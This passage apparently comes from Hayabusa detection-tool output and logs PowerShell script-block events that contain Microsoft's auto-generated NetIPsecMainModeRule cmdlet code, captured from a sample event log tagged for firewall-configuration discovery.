[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] 
${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml 
}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] 
${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, 
$script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, 
$true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and 
(@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = 